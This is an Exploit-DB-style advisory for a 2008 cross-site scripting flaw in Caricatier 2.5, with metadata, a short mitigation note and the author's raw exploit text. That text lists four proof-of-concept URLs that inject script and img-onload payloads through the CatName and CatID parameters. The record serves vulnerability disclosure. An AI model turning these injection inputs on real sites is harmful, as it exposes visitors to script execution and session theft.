Caricatier 2.5 Cross Site Scripting Vulnerability

vendor:

Caricatier

by:

indoushka

8.8

CVSS

HIGH

Cross Site Scripting

CWE

Product Name: Caricatier

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: NO

Related CWE: N/A

CPE: a:php-ar:caricatier:2.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)

2008

Caricatier 2.5 Cross Site Scripting Vulnerability

Caricatier 2.5 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the 'CatName' parameter of the 'comment.php' script, the 'CatName' parameter of the 'view_caricatier.php' script, and the 'CatName' parameter of the 'view_caricatier.php' script. This malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and filtered before being used in the application.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : caricatier 2.5 Cross Site Scripting Vulnerability                       |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : ÈÇÓÊÎÏÇã ÓßÑíÈÊ ÇáßÇÑíßÇÊíÑ ÇáÇÕÏÇÑ : Version 2.5 /http://www.php-ar.com/|
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://server/caricatier/comment.php?op=CatID%3D0&CatName=1<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1
| 2- http://server/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1
| 3- http://server/caricatier/view_caricatier.php?op=open&CatID=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1&CatName=indoushka@hotmail.com-00213771818860
| 4- http://server/caricatier/view_caricatier.php?op=open&CatID=0&CaricatierID=1&CatName=1<img+src=http://server/jpg.jpg+onload=alert(213771818860)>
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------